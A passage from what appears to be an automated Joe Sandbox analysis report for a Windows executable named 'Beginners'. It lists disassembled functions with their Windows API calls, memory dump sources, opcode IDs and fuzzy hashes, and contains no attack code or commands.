                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: a808084220c446af0b440bcef6d62e0f395f1d70d5f2254da3ce3ddc4f5ec767
                                          • Instruction ID: 9a33689fc69c81c4efc85baaec569fd114238380eb719ea78f07fa79ec37885f
                                          • Opcode Fuzzy Hash: a808084220c446af0b440bcef6d62e0f395f1d70d5f2254da3ce3ddc4f5ec767
                                          • Instruction Fuzzy Hash: EB41E572A40209BADF249BA4CC55FEF77BDEF45710F00047AF910A7281D77199448B65
                                          Function 000C31BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0010032B
                                          • GetOpenFileNameW.COMDLG32(?), ref: 00100375
                                            • Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4
                                            • Part of subcall function 000D09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000D09E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen_memset
                                          • String ID: X
                                          • API String ID: 3777226403-3081909835
                                          • Opcode ID: 7db2851ab4f7e4b8c97458794d0b84a7030d3b3bc2c355bc06bea3238deb05ac
                                          • Instruction ID: 443dae224c4443ab1d5d4123d3938835db8d20d7b01ccb9f9fcf2f8f5b8049dd
                                          • Opcode Fuzzy Hash: 7db2851ab4f7e4b8c97458794d0b84a7030d3b3bc2c355bc06bea3238deb05ac
                                          • Instruction Fuzzy Hash: 74219371A142989FDF51DF98C845BEE7BF8AF49310F00405AE408B7282DBB55A89CFA1
                                          Function 0012D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56c5ac41d737a64bf6d0f75de1ca65d2694865093851072aa16ab8a97f961ae8
                                          • Instruction ID: 44d43126a90de706557a540bf7664d90b055556b5fba0b18c6fc7e50296ac9cf
                                          • Opcode Fuzzy Hash: 56c5ac41d737a64bf6d0f75de1ca65d2694865093851072aa16ab8a97f961ae8
                                          • Instruction Fuzzy Hash: 3DF149706083519FC714DF28E484A6ABBE5FF88314F14892EF8999B352DB70E955CF82
                                          Function 000BABB2 Relevance: 4.6, APIs: 3, Instructions: 125comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000BAD08
                                          • OleInitialize.OLE32(00000000), ref: 000BAD85
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HandleInitialize
                                          • String ID:
                                          • API String ID: 3139323997-0
                                          • Opcode ID: 2be022056335b45339ba0aa975ffdd921cc23f2377349329a368226db50c060a
                                          • Instruction ID: b8c3c9b024c8c39a2e89adf3fd1e8cdb124b975ad1bf769d5ffc995c9231da07
                                          • Opcode Fuzzy Hash: 2be022056335b45339ba0aa975ffdd921cc23f2377349329a368226db50c060a
                                          • Instruction Fuzzy Hash: 3351C1B090C3418EC799DF29AD486557FF5EB59310F1485AAD41EC7AF2E73044C4CB61
                                          Function 000C59D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 000C59F9
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C5A9E
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000C5ABB
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$_memset
                                          • String ID:
                                          • API String ID: 1505330794-0
                                          • Opcode ID: 1a9d02e3701dcc1931dec66380e894d37dde6d9b49577e32a5b60832153e8b85
                                          • Instruction ID: de5be9261e426db12bd9d145bcbcfae051cdaa565d714a7b2e392f644f1f4639
                                          • Opcode Fuzzy Hash: 1a9d02e3701dcc1931dec66380e894d37dde6d9b49577e32a5b60832153e8b85
                                          • Instruction Fuzzy Hash: 543180B4505B018FC761DF65DC84B9BBBF4FB49305F000A2EF6AA82291E77169C4CB52
                                          Function 000D593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 000D5953
                                            • Part of subcall function 000DA39B: __NMSG_WRITE.LIBCMT ref: 000DA3C2
                                            • Part of subcall function 000DA39B: __NMSG_WRITE.LIBCMT ref: 000DA3CC
                                          • __NMSG_WRITE.LIBCMT ref: 000D595A
                                            • Part of subcall function 000DA3F8: GetModuleFileNameW.KERNEL32(00000000,001753BA,00000104,00000004,00000001,000D1003), ref: 000DA48A
                                            • Part of subcall function 000DA3F8: ___crtMessageBoxW.LIBCMT ref: 000DA538
                                            • Part of subcall function 000D32CF: ___crtCorExitProcess.LIBCMT ref: 000D32D5
                                            • Part of subcall function 000D32CF: ExitProcess.KERNEL32 ref: 000D32DE
                                            • Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58
                                          • RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000004,?,?,000D1003,?), ref: 000D597F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: 0da35e9c4695fc5cff7821e0aee0652f35974aababb359c91031e37821fd0f63
                                          • Instruction ID: b426dfd194026340458a539515c939e016420391ff477bee447a742a9041aaf5
                                          • Opcode Fuzzy Hash: 0da35e9c4695fc5cff7821e0aee0652f35974aababb359c91031e37821fd0f63
                                          • Instruction Fuzzy Hash: 2A01F531341B01DAE7512B25AC62AAEB39A8F52772F600027FD189B3D2DEB08D804771
                                          Function 000B5E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: 9f0d7a7b438516dcd60a59ff86dbb48223249c47bcb2edd07680b794ea5fa0fd
                                          • Instruction ID: a9036a55f806446971cdd86a27aec3309d6921f728ee3c16de5caab8ae9b0e37
                                          • Opcode Fuzzy Hash: 9f0d7a7b438516dcd60a59ff86dbb48223249c47bcb2edd07680b794ea5fa0fd
                                          • Instruction Fuzzy Hash: 26324970508341DFDB24DF14C494BAAB7E1BF84304F19896DE88A9B362D776ED85CB82
                                          Function 000C48B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: EA06
                                          • API String ID: 4104443479-3962188686
                                          • Opcode ID: 1f8544afdc70d2d5571eeee00f93a6e27a6e94d8f40776d071cf7528aed13444
                                          • Instruction ID: 5ffdaf055152db0d7d62888a298727ded24331aa0ff0f4e2c904b53beb498976
                                          • Opcode Fuzzy Hash: 1f8544afdc70d2d5571eeee00f93a6e27a6e94d8f40776d071cf7528aed13444
                                          • Instruction Fuzzy Hash: B1413B31E041685BDF329B548861BFF7BA5FB55310F648079F8C6A7287D6718D8483E2
                                          Function 0012E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                          Download Yara Rule
                                          APIs
                                          • _strcat.LIBCMT ref: 0012E20C
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • _wcscpy.LIBCMT ref: 0012E29B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __itow__swprintf_strcat_wcscpy
                                          • String ID:
                                          • API String ID: 1012013722-0
                                          • Opcode ID: ed6f580dfebcb723fbbfb84c1652d42a56f29431a2c15acb675941f1643a8df8
                                          • Instruction ID: a16d9d11e26da3e6bd21d31969e1e892be087ffa591e562cfd4add11a109be88
                                          • Opcode Fuzzy Hash: ed6f580dfebcb723fbbfb84c1652d42a56f29431a2c15acb675941f1643a8df8
                                          • Instruction Fuzzy Hash: 72915735A00614DFCB18EF18D4819A9B7F5FF59311B5580AAE80A8F3A2DB30EE11CB90
                                          Function 000D0E38 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3712363035-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: b04f76b88c450fdc4efd7db694a5b0685734995b0beee6524ad77e46591c89d5
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: 2731B271A00209DBD768DF59C480A6DF7A6FF99300F648AA6E409CB751E731EDC1CBA0
                                          Function 000C5F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 000C5FEF
                                            • Part of subcall function 000D359C: __lock.LIBCMT ref: 000D35A2
                                            • Part of subcall function 000D359C: DecodePointer.KERNEL32(00000001,?,000C6004,00108892), ref: 000D35AE
                                            • Part of subcall function 000D359C: EncodePointer.KERNEL32(?,?,000C6004,00108892), ref: 000D35B9
                                            • Part of subcall function 000C5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000C5F18
                                            • Part of subcall function 000C5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000C5F2D
                                            • Part of subcall function 000C5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000C526C
                                            • Part of subcall function 000C5240: IsDebuggerPresent.KERNEL32 ref: 000C527E
                                            • Part of subcall function 000C5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 000C52E6
                                            • Part of subcall function 000C5240: SetCurrentDirectoryW.KERNEL32(?), ref: 000C5366
                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 000C602F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                          • String ID:
                                          • API String ID: 1438897964-0
                                          • Opcode ID: 7b82ae59f997e712ab34576b82d342819bfead9e9f0ba79e19e5a57f6a7f50c7
                                          • Instruction ID: 3cbee4b89a9c788f251564543d34fc5452e259eb011c8e2b01592bde5554f137
                                          • Opcode Fuzzy Hash: 7b82ae59f997e712ab34576b82d342819bfead9e9f0ba79e19e5a57f6a7f50c7
                                          • Instruction Fuzzy Hash: 1D116D718083019BC310DF69EC45A8AFBF8EB88310F00491EF199872B3DBB095C4CB92
                                          Function 000C42F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,000C3E72,?,?,?,00000000), ref: 000C4327
                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,000C3E72,?,?,?,00000000), ref: 00100717
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 7bf97414c9734b7b346fa276ad3f5ccb1af1678db56ceb6d0cfcd763ba877202
                                          • Instruction ID: a3b9647b8c81a6d63ea52f44e904376abe0b3a5034267e90bdb4ea80314274e6
                                          • Opcode Fuzzy Hash: 7bf97414c9734b7b346fa276ad3f5ccb1af1678db56ceb6d0cfcd763ba877202
                                          • Instruction Fuzzy Hash: 4C018070244249BEF3710F248C9AFAA7ADCBB05768F10C219BAE46A1E1C7F59D858B14
                                          Function 000D0FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000D593C: __FF_MSGBANNER.LIBCMT ref: 000D5953
                                            • Part of subcall function 000D593C: __NMSG_WRITE.LIBCMT ref: 000D595A
                                            • Part of subcall function 000D593C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000004,?,?,000D1003,?), ref: 000D597F
                                          • std::exception::exception.LIBCMT ref: 000D101C
                                          • __CxxThrowException@8.LIBCMT ref: 000D1031
                                            • Part of subcall function 000D87CB: RaiseException.KERNEL32(?,?,?,0016CAF8,?,?,?,?,?,000D1036,?,0016CAF8,?,00000001), ref: 000D8820
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 3902256705-0
                                          • Opcode ID: 8439bcad47e861edd0ea587e9b975cef3e1a0941946ff121df1a8978e613ee87
                                          • Instruction ID: b2d749ec11e125b32226ea5ba0c0b107ba66d1b4cb2088de3e5c9c4123e2d841
                                          • Opcode Fuzzy Hash: 8439bcad47e861edd0ea587e9b975cef3e1a0941946ff121df1a8978e613ee87
                                          • Instruction Fuzzy Hash: 27F0813550431DB6DB20BA98ED15ADE7BAC9F01310F604467F918A2792DFB18A90D6B1
                                          Function 000D581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __lock_file_memset
                                          • String ID:
                                          • API String ID: 26237723-0
                                          • Opcode ID: 54fc96229bfe50533ad04154822b72162bdfcb318e059064e609e58bd89173ca
                                          • Instruction ID: f502f09722159856b033765915eab388b2001845fc317c371cddb8ae20335e35
                                          • Opcode Fuzzy Hash: 54fc96229bfe50533ad04154822b72162bdfcb318e059064e609e58bd89173ca
                                          • Instruction Fuzzy Hash: 1F014871800749EBCF11AF65CC019DE7BA1AF80361F148117BC24673A2DB318611EFB1
                                          Function 000D55C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58
                                          • __lock_file.LIBCMT ref: 000D560B
                                            • Part of subcall function 000D6E3E: __lock.LIBCMT ref: 000D6E61
                                          • __fclose_nolock.LIBCMT ref: 000D5616
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: c515275361db39a7393776c4f4992e5c955044853e12585566b20a4fc832fe7e
                                          • Instruction ID: e7552000347639032be97235ac0ccfc9b15be454150432388e09fd4718aacb38
                                          • Opcode Fuzzy Hash: c515275361db39a7393776c4f4992e5c955044853e12585566b20a4fc832fe7e
                                          • Instruction Fuzzy Hash: DBF09071801B059AD7226B699C02BAE77E16F41332F25820BB864AB3C2CB7C89019B71
                                          Function 000D5E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • __lock_file.LIBCMT ref: 000D5EB4
                                          • __ftell_nolock.LIBCMT ref: 000D5EBF
                                            • Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2999321469-0
                                          • Opcode ID: c3d96f40201768ec1f76b65a5f949a3b78dd77b6b79c16ca6799e961fec88cbe
                                          • Instruction ID: f9d0009bd3fa324237d3b6ff0c5aab5027b90684a6c2f42cb3ec0629869205c7
                                          • Opcode Fuzzy Hash: c3d96f40201768ec1f76b65a5f949a3b78dd77b6b79c16ca6799e961fec88cbe
                                          • Instruction Fuzzy Hash: 3CF0A0319117159ADB10BB788C037EE73A06F41332F218207B820AB3D3CF788A029BB1
                                          Function 000C5AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 000C5AEF
                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 000C5B1F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell__memset
                                          • String ID:
                                          • API String ID: 928536360-0
                                          • Opcode ID: f1ffb5fd0c17e3dde0a1a15878dc30768d041811368ee46cf1f6b87069c68585
                                          • Instruction ID: 8698b50b218ba656b425285a2cc21e22b076d621d98e5276f27e9b5f19979d7d
                                          • Opcode Fuzzy Hash: f1ffb5fd0c17e3dde0a1a15878dc30768d041811368ee46cf1f6b87069c68585
